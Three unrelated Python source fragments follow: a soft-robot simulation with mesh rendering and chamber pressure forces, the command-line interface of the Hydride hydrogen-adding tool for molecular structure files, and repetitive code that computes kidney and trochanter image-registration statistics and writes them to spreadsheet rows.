elif isinstance(mesh_file, tuple) or self._mesh_type == 'hex':
mesh = HexMesh3d()
mesh.Initialize(mesh_file[1] if isinstance(mesh_file, tuple) else mesh_file)
renderer.add_hex_mesh(
mesh,
transforms=transforms,
render_voxel_edge=True,
color='0096c7'
)
# motion markers at the tip
for q_real in qs_real[i,:4]:
renderer.add_shape_mesh({
'name': 'sphere',
'center': q_real,
'radius': 0.004
},
color='d60000',
transforms=transforms
)
renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',texture_img='chkbd_24_0.7', transforms=[('s', 2)])
renderer.render()
def _loss_and_grad(self, q, v):
loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad)
def apply_inner_pressure(self, p, q=None, chambers=[0,1,2,3]):
"""
Applies some pressure on all nodes on the inner surface of specific chambers.
Arguments:
p (float) : pressure difference uniformly in the cube, difference with pressure outside the cube
q (ndarray with shape [3*N]) : (optional) node positions at this timestep
chambers (list) : (optional) chambers where pressure should be applied input as a list of integers.
Returns:
f (ndarray with shape [3*N]) : external forces on all nodes for this one timestep.
"""
f_ext = np.zeros_like(self._f_ext)
f_ext_count = np.zeros_like(f_ext, dtype=int) # We apply forces multiple times on same vertex, we take the average in the end
verts = q.reshape(-1, 3) if q is not None else self._q0.reshape(-1, 3)
chamber_faces = np.concatenate([self._inner_faces[i] for i in chambers])
for face in chamber_faces:
# Find surface normal (same for tet and hex)
v0, v1, v2 = verts[face[0]], verts[face[1]], verts[face[2]]
# Cross product is the unnormalized normal vector (of which the norm is the surface area of the parallelogram spanned by the two vectors)
cross_prod = np.cross((v1-v0), (v2-v0))
#face_centers.append((v0+v1+v2)/3)
#face_normals.append(-cross_prod)
if self._mesh_type == 'tet':
# Triangle area
area_factor = 0.5
elif self._mesh_type == 'hex':
# Square area
area_factor = 1
f_pressure = -p * area_factor * cross_prod
for vertex_idx in face:
# Apply forces in x, y and z directions (3 dimensional)
for d in | |
# This source code is part of the Hydride package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__ = "hydride"
__author__ = "<NAME>"
from os.path import splitext
import sys
import argparse
import warnings
import numpy as np
import biotite.structure as struc
import biotite.structure.io.pdb as pdb
import biotite.structure.io.pdbx as pdbx
import biotite.structure.io.mmtf as mmtf
import biotite.structure.io.mol as mol
from .add import add_hydrogen
from. charge import estimate_amino_acid_charges
from .fragments import FragmentLibrary
from .names import AtomNameLibrary
from .relax import relax_hydrogen
class UserInputError(Exception):
pass
def main(args=None):
parser = argparse.ArgumentParser(
description="This program adds hydrogen atoms to molecular "
"structures where these are missing.\n"
"For more information, please visit "
"https://hydride.biotite-python.org/.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"--infile", "-i", metavar="FILE",
help="The path to the input structure file containing the model "
"without hydrogen atoms. "
"If omitted, the file is read from STDOUT."
)
parser.add_argument(
"--outfile", "-o", metavar="FILE",
help="The path to the output structure file where the model "
"with added hydrogen atoms should be written to. "
"If omitted, the file is written to STDOUT. "
"Any existing hydrogen atoms will be removed the model."
)
parser.add_argument(
"--informat", "-I",
choices=["pdb", "pdbx", "cif", "mmtf", "sdf", "mol"],
help="The file format of the input file. "
"Must be specified if input file is read from STDIN. "
"If omitted, the file format is guessed from the suffix "
"of the file."
)
parser.add_argument(
"--outformat", "-O",
choices=["pdb", "pdbx", "cif", "mmtf", "mol"],
help="The file format of the output file. "
"Must be specified if output file is written to STDOUT."
"If omitted, the file format is guessed from the suffix "
"of the file."
)
parser.add_argument(
"--verbose", "-v", action="store_true",
help="Verbose display of errors."
)
parser.add_argument(
"--no-relax", action="store_true",
help="Omit the relaxation step. "
"Note bond lengths and angles will still be correct. "
"However clashes or electrostatically unfavorable "
"conformations will not be resolved."
)
parser.add_argument(
"--iterations", "-n", type=int, metavar="NUMBER",
help="The maximum number of relaxation iterations. "
"The runtime of the relaxation scales approximately "
"linear with this value, if the relaxation does not "
"terminate before. "
"By default, the relaxation runs until a local optimum "
"has been reached."
)
parser.add_argument(
"--angle-increment", "-a", type=float, metavar="NUMBER", default=10.0,
help="The angle in degrees that a freely rotatable bond is rotated "
"in each relaxation step."
"Lower values increase the accuracy of hydrogen positioning, "
"but increase the required number of steps until an optimum "
"is found."
)
parser.add_argument(
"--fragments", "-f", metavar="FILE", action="append",
help="Additional structure file to containing fragments for the "
"fragment library. "
"This can be used supply fragments for molecules with uncommon "
"groups, if the standard fragment library does not contain such "
"fragments, yet. "
"May be supplied multiple times."
)
parser.add_argument(
"--fragformat", "-F",
choices=["pdb", "pdbx", "cif", "mmtf", "sdf", "mol"],
help="The file format of the additional structure files. "
"If omitted, the file format is guessed from the suffix "
"of the file."
)
parser.add_argument(
"--ignore", "-g", metavar="RESIDUE", action="append", nargs=2,
help="No hydrogen atoms are added to the specified residue. "
"The format is '{chain} {residue}', e.g. 'A 123'. "
"May be supplied multiple times, if multiple residues should be "
"ignored."
)
parser.add_argument(
"--model", "-m", type=int, metavar="NUMBER", default=1,
help="The model number, if the input structure file contains multiple "
"models."
)
parser.add_argument(
"--charges", "-c", type=float, metavar="PH",
help="Recalculate the charges of atoms in amino acids based on the "
"given pH value. "
"This estimation does not take the surrounding amino acids into "
"account."
)
parser.add_argument(
"--pbc", "-p", action="store_true",
help="Set hydrogen addition and relaxation aware to periodic boundary "
"conditions. "
"The box is read from the input structure file."
)
args = parser.parse_args(args=args)
try:
run(args)
except UserInputError as e:
print(f"Error: {e}", file=sys.stderr)
if args.verbose:
raise
else:
sys.exit(1)
except Exception as e:
print("An unexpected error occured:\n", file=sys.stderr)
raise
def run(args):
frag_library = FragmentLibrary.standard_library()
name_library = AtomNameLibrary.standard_library()
if args.fragments is not None:
for frag_path in args.fragments:
try:
model = read_structure(frag_path, args.fragformat, 1)
except UserInputError:
raise
except PermissionError:
raise UserInputError(
f"Missing file permission for reading '{frag_path}'"
)
except FileNotFoundError:
raise UserInputError(
f"Input file '{args.infile}' cannot be found"
)
except:
raise UserInputError(
f"Input file '{args.infile}' contains invalid data"
)
frag_library.add_molecule(model)
name_library.add_molecule(model)
try:
model = read_structure(args.infile, args.informat, args.model)
except UserInputError:
raise
except PermissionError:
raise UserInputError(
f"Missing file permission for reading '{args.infile}'"
)
except FileNotFoundError:
raise UserInputError(
f"Input file '{args.infile}' cannot be found"
)
except:
raise UserInputError(
f"Input file '{args.infile}' contains invalid data"
)
heavy_mask = (model.element != "H")
if not heavy_mask.all():
warnings.warn("Existing hydrogen atoms were removed")
model = model[heavy_mask]
pass
if args.charges:
aa_mask = struc.filter_amino_acids(model)
charges = estimate_amino_acid_charges(model, args.charges)
model.charge[aa_mask] = charges[aa_mask]
input_mask = np.ones(model.array_length(), dtype=bool)
if args.ignore is not None:
for chain_id, res_id in args.ignore:
res_id = int(res_id)
removal_mask = (model.chain_id == chain_id) & \
(model.res_id == res_id)
if not removal_mask.any():
raise UserInputError(
f"Cannot find '{chain_id} {res_id}' "
"in the input structure"
)
input_mask &= ~removal_mask
if args.pbc:
if model.box is None:
raise UserInputError(
"The input structure file does not provide box vectors "
"required for handling periodic boundary conditions"
)
box = True
else:
box=None
model, _ = add_hydrogen(
model, input_mask, frag_library, name_library, box
)
if not args.no_relax:
if args.iterations is not None and args.iterations < 0:
raise UserInputError("The number of iterations must be positive")
model.coord = relax_hydrogen(
model, args.iterations,
angle_increment=np.deg2rad(args.angle_increment),
box=box
)
try:
write_structure(args.outfile, args.outformat, model)
except UserInputError:
raise
except PermissionError:
raise UserInputError(
f"Missing file permission for writing '{args.outfile}'"
)
except:
raise
def read_structure(path, format, model_number):
if format is None:
if path is None:
raise UserInputError(
"The input file format must be given, "
"if the input file is read from STDIN"
)
format = guess_format(path)
if model_number < 1:
raise UserInputError("Model number must be positive")
if path is None:
path = sys.stdin
if format == "pdb":
pdb_file = pdb.PDBFile.read(path)
model_count = pdb.get_model_count(pdb_file)
if model_number > model_count:
raise UserInputError(
f"Model number {model_number} is out of range "
f"for the input structure with {model_count} models"
)
model = pdb.get_structure(
pdb_file, model=model_number, extra_fields=["charge"]
)
model.bonds = struc.connect_via_residue_names(model)
elif format == "pdbx" or format == "cif":
pdbx_file = pdbx.PDBxFile.read(path)
model_count = pdbx.get_model_count(pdbx_file)
if model_number > model_count:
raise UserInputError(
f"Model number {model_number} is out of range "
f"for the input structure with {model_count} models"
)
model = pdbx.get_structure(
pdbx_file, model=model_number, extra_fields=["charge"]
)
model.bonds = struc.connect_via_residue_names(model)
elif format == "mmtf":
if path == sys.stdin:
# Special handling for binary input
mmtf_file = mmtf.MMTFFile.read(sys.stdin.buffer)
else:
mmtf_file = mmtf.MMTFFile.read(path)
model_count = mmtf.get_model_count(mmtf_file)
if model_number > model_count:
raise UserInputError(
f"Model number {model_number} is out of range "
f"for the input structure with {model_count} models"
)
model = mmtf.get_structure(
mmtf_file, model=model_number, include_bonds=True,
extra_fields=["charge"]
)
if model.bonds.get_bond_count() == 0:
# No bonds were stored in MMTF file
# -> Predict bonds
model.bonds = struc.connect_via_residue_names(model)
elif format == "mol" or format == "sdf":
mol_file = mol.MOLFile.read(path)
if model_number > 1:
raise UserInputError(
f"Model number {model_number} is out of range "
f"for the input structure with 1 models"
)
model = mol_file.get_structure()
model.res_name[:] = mol_file.lines[0].strip()
else:
raise UserInputError(f"Unknown file format '{format}'")
return model
def write_structure(path, format, model):
if format is None:
if path is None:
raise UserInputError(
"The output file format must be given, "
"if the output written to STDOUT"
)
format = guess_format(path)
if path is None:
path = sys.stdout
if format == "pdb":
pdb_file = pdb.PDBFile()
pdb.set_structure(pdb_file, model)
pdb_file.write(path)
elif format == "pdbx" or format == "cif":
pdbx_file = pdbx.PDBxFile()
pdbx.set_structure(pdbx_file, model, data_block="STRUCTURE")
pdbx_file.write(path)
elif format == "mmtf":
mmtf_file = mmtf.MMTFFile()
mmtf.set_structure(mmtf_file, model)
if path == sys.stdout:
# Special handling for binary output
mmtf_file.write(sys.stdout.buffer)
else:
mmtf_file.write(path)
elif format == "mol" or format == "sdf":
mol_file = mol.MOLFile()
mol_file.set_structure(model)
mol_file.set_header(model.res_name[0])
mol_file.write(path)
else:
raise UserInputError(f"Unknown file format '{format}'")
def guess_format(path):
suffix = splitext(path)[-1].lower()
if suffix in [".pdb"]:
return "pdb"
elif suffix in [".pdbx", ".cif", ".mmcif"]:
return "pdbx"
elif suffix in [".mmtf"]:
return "mmtf"
elif suffix in [".mol", ".sdf"]:
return "mol"
else:
raise UserInputError(f"Unknown | |
1
kidney_sheet.write(kidney_row,0,"median all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_med)
kidney_sheet.write(kidney_row,3,kidney_dices_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev all kidney img params")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_min)
kidney_sheet.write(kidney_row,3,kidney_dices_in_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_max)
kidney_sheet.write(kidney_row,3,kidney_dices_in_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_med)
kidney_sheet.write(kidney_row,3,kidney_dices_in_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_in_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev in")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_in_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_in_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_in_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_in_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_min)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_max)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_med)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev opp")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_opp_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_opp_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_opp_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_opp_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_min)
kidney_sheet.write(kidney_row,3,kidney_dices_F_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_max)
kidney_sheet.write(kidney_row,3,kidney_dices_F_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_med)
kidney_sheet.write(kidney_row,3,kidney_dices_F_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_F_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev F")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_F_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_F_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_F_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_F_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_min)
kidney_sheet.write(kidney_row,3,kidney_dices_W_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_max)
kidney_sheet.write(kidney_row,3,kidney_dices_W_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_med)
kidney_sheet.write(kidney_row,3,kidney_dices_W_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_W_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev W")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_W_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_W_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_W_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_W_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_min)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_max)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_med)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev T1 non fs")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T1_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T1_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_T1_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T1_stdev)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"min T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_min)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_min)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_min)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_min)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"max T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_max)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_max)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_max)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_max)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"median T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_med)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_med)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_med)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_med)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"mean T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_mean)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_mean)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_mean)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_mean)
kidney_row += 1
kidney_sheet.write(kidney_row,0,"stdev T2 haste tirm")
kidney_sheet.write(kidney_row,1,kidney_dist_errors_T2_stdev)
kidney_sheet.write(kidney_row,2,kidney_total_rewards_T2_stdev)
kidney_sheet.write(kidney_row,3,kidney_dices_T2_stdev)
kidney_sheet.write(kidney_row,4,kidney_overlaps_T2_stdev)
kidney_row += 1
################# trochanter ###################
troch_dist_errors_min = min(troch_dist_errors)
troch_total_rewards_min = min(troch_total_rewards)
troch_dices_min = min(troch_dices)
troch_overlaps_min = min(troch_overlaps)
troch_dist_errors_max = max(troch_dist_errors)
troch_total_rewards_max = max(troch_total_rewards)
troch_dices_max = max(troch_dices)
troch_overlaps_max = max(troch_overlaps)
troch_dist_errors_med = statistics.median(troch_dist_errors)
troch_total_rewards_med = statistics.median(troch_total_rewards)
troch_dices_med = statistics.median(troch_dices)
troch_overlaps_med = statistics.median(troch_overlaps)
troch_dist_errors_mean = statistics.mean(troch_dist_errors)
troch_total_rewards_mean = statistics.mean(troch_total_rewards)
troch_dices_mean = statistics.mean(troch_dices)
troch_overlaps_mean = statistics.mean(troch_overlaps)
troch_dist_errors_stdev = statistics.stdev(troch_dist_errors)
troch_total_rewards_stdev = statistics.stdev(troch_total_rewards)
troch_dices_stdev = statistics.stdev(troch_dices)
troch_overlaps_stdev = statistics.stdev(troch_overlaps)
troch_dist_errors_in_min = min(troch_dist_errors_in)
troch_total_rewards_in_min = min(troch_total_rewards_in)
troch_dices_in_min = min(troch_dices_in)
troch_overlaps_in_min = min(troch_overlaps_in)
troch_dist_errors_in_max = max(troch_dist_errors_in)
troch_total_rewards_in_max = max(troch_total_rewards_in)
troch_dices_in_max = max(troch_dices_in)
troch_overlaps_in_max = max(troch_overlaps_in)
troch_dist_errors_in_med = statistics.median(troch_dist_errors_in)
troch_total_rewards_in_med = statistics.median(troch_total_rewards_in)
troch_dices_in_med = statistics.median(troch_dices_in)
troch_overlaps_in_med = statistics.median(troch_overlaps_in)
troch_dist_errors_in_mean = statistics.mean(troch_dist_errors_in)
troch_total_rewards_in_mean = statistics.mean(troch_total_rewards_in)
troch_dices_in_mean = statistics.mean(troch_dices_in)
troch_overlaps_in_mean = statistics.mean(troch_overlaps_in)
troch_dist_errors_in_stdev = statistics.stdev(troch_dist_errors_in)
troch_total_rewards_in_stdev = statistics.stdev(troch_total_rewards_in)
troch_dices_in_stdev = statistics.stdev(troch_dices_in)
troch_overlaps_in_stdev = statistics.stdev(troch_overlaps_in)
troch_dist_errors_opp_min = min(troch_dist_errors_opp)
troch_total_rewards_opp_min = min(troch_total_rewards_opp)
troch_dices_opp_min = min(troch_dices_opp)
troch_overlaps_opp_min = min(troch_overlaps_opp)
troch_dist_errors_opp_max = max(troch_dist_errors_opp)
troch_total_rewards_opp_max = max(troch_total_rewards_opp)
troch_dices_opp_max = max(troch_dices_opp)
troch_overlaps_opp_max = max(troch_overlaps_opp)
troch_dist_errors_opp_med = statistics.median(troch_dist_errors_opp)
troch_total_rewards_opp_med = statistics.median(troch_total_rewards_opp)
troch_dices_opp_med = statistics.median(troch_dices_opp)
troch_overlaps_opp_med = statistics.median(troch_overlaps_opp)
troch_dist_errors_opp_mean = statistics.mean(troch_dist_errors_opp)
troch_total_rewards_opp_mean = statistics.mean(troch_total_rewards_opp)
troch_dices_opp_mean = statistics.mean(troch_dices_opp)
troch_overlaps_opp_mean = statistics.mean(troch_overlaps_opp)
troch_dist_errors_opp_stdev = statistics.stdev(troch_dist_errors_opp)
troch_total_rewards_opp_stdev = statistics.stdev(troch_total_rewards_opp)
troch_dices_opp_stdev = statistics.stdev(troch_dices_opp)
troch_overlaps_opp_stdev = statistics.stdev(troch_overlaps_opp)
troch_dist_errors_F_min = min(troch_dist_errors_F)
troch_total_rewards_F_min = min(troch_total_rewards_F)
troch_dices_F_min = min(troch_dices_F)
troch_overlaps_F_min = min(troch_overlaps_F)
troch_dist_errors_F_max = max(troch_dist_errors_F)
troch_total_rewards_F_max = max(troch_total_rewards_F)
troch_dices_F_max = max(troch_dices_F)
troch_overlaps_F_max = max(troch_overlaps_F)
troch_dist_errors_F_med = statistics.median(troch_dist_errors_F)
troch_total_rewards_F_med = statistics.median(troch_total_rewards_F)
troch_dices_F_med = statistics.median(troch_dices_F)
troch_overlaps_F_med = statistics.median(troch_overlaps_F)
troch_dist_errors_F_mean = statistics.mean(troch_dist_errors_F)
troch_total_rewards_F_mean = statistics.mean(troch_total_rewards_F)
troch_dices_F_mean = statistics.mean(troch_dices_F)
troch_overlaps_F_mean = statistics.mean(troch_overlaps_F)
troch_dist_errors_F_stdev = statistics.stdev(troch_dist_errors_F)
troch_total_rewards_F_stdev = statistics.stdev(troch_total_rewards_F)
troch_dices_F_stdev = statistics.stdev(troch_dices_F)
troch_overlaps_F_stdev = statistics.stdev(troch_overlaps_F)
troch_dist_errors_W_min = min(troch_dist_errors_W)
troch_total_rewards_W_min = min(troch_total_rewards_W)
troch_dices_W_min = min(troch_dices_W)
troch_overlaps_W_min = min(troch_overlaps_W)
troch_dist_errors_W_max = max(troch_dist_errors_W)
troch_total_rewards_W_max = max(troch_total_rewards_W)
troch_dices_W_max = max(troch_dices_W)
troch_overlaps_W_max = max(troch_overlaps_W)
troch_dist_errors_W_med = statistics.median(troch_dist_errors_W)
troch_total_rewards_W_med = statistics.median(troch_total_rewards_W)
troch_dices_W_med = statistics.median(troch_dices_W)
troch_overlaps_W_med = statistics.median(troch_overlaps_W)
troch_dist_errors_W_mean = statistics.mean(troch_dist_errors_W)
troch_total_rewards_W_mean = statistics.mean(troch_total_rewards_W)
troch_dices_W_mean = statistics.mean(troch_dices_W)
troch_overlaps_W_mean = statistics.mean(troch_overlaps_W)
troch_dist_errors_W_stdev = statistics.stdev(troch_dist_errors_W)
troch_total_rewards_W_stdev = statistics.stdev(troch_total_rewards_W)
troch_dices_W_stdev = statistics.stdev(troch_dices_W)
troch_overlaps_W_stdev = statistics.stdev(troch_overlaps_W)
troch_dist_errors_T1_min = min(troch_dist_errors_T1)
troch_total_rewards_T1_min = min(troch_total_rewards_T1)
troch_dices_T1_min = min(troch_dices_T1)
troch_overlaps_T1_min = min(troch_overlaps_T1)
troch_dist_errors_T1_max = max(troch_dist_errors_T1)
troch_total_rewards_T1_max = max(troch_total_rewards_T1)
troch_dices_T1_max = max(troch_dices_T1)
troch_overlaps_T1_max = max(troch_overlaps_T1)
troch_dist_errors_T1_med = statistics.median(troch_dist_errors_T1)
troch_total_rewards_T1_med = statistics.median(troch_total_rewards_T1)
troch_dices_T1_med = statistics.median(troch_dices_T1)
troch_overlaps_T1_med = statistics.median(troch_overlaps_T1)
troch_dist_errors_T1_mean = statistics.mean(troch_dist_errors_T1)
troch_total_rewards_T1_mean = statistics.mean(troch_total_rewards_T1)
troch_dices_T1_mean = statistics.mean(troch_dices_T1)
troch_overlaps_T1_mean = statistics.mean(troch_overlaps_T1)
troch_dist_errors_T1_stdev = statistics.stdev(troch_dist_errors_T1)
troch_total_rewards_T1_stdev = statistics.stdev(troch_total_rewards_T1)
troch_dices_T1_stdev = statistics.stdev(troch_dices_T1)
troch_overlaps_T1_stdev = statistics.stdev(troch_overlaps_T1)
troch_dist_errors_T2_min = min(troch_dist_errors_T2)
troch_total_rewards_T2_min = min(troch_total_rewards_T2)
troch_dices_T2_min = min(troch_dices_T2)
troch_overlaps_T2_min = min(troch_overlaps_T2)
troch_dist_errors_T2_max = max(troch_dist_errors_T2)
troch_total_rewards_T2_max = max(troch_total_rewards_T2)
troch_dices_T2_max = max(troch_dices_T2)
troch_overlaps_T2_max = max(troch_overlaps_T2)
troch_dist_errors_T2_med = statistics.median(troch_dist_errors_T2)
troch_total_rewards_T2_med = statistics.median(troch_total_rewards_T2)
troch_dices_T2_med = statistics.median(troch_dices_T2)
troch_overlaps_T2_med = statistics.median(troch_overlaps_T2)
troch_dist_errors_T2_mean = statistics.mean(troch_dist_errors_T2)
troch_total_rewards_T2_mean = statistics.mean(troch_total_rewards_T2)
troch_dices_T2_mean = statistics.mean(troch_dices_T2)
troch_overlaps_T2_mean = statistics.mean(troch_overlaps_T2)
troch_dist_errors_T2_stdev = statistics.stdev(troch_dist_errors_T2)
troch_total_rewards_T2_stdev = statistics.stdev(troch_total_rewards_T2)
troch_dices_T2_stdev = statistics.stdev(troch_dices_T2)
troch_overlaps_T2_stdev = statistics.stdev(troch_overlaps_T2)
troch_sheet.write(troch_row,0,"min all troch img params")
troch_sheet.write(troch_row,1,troch_dist_errors_min)
troch_sheet.write(troch_row,2,troch_total_rewards_min)
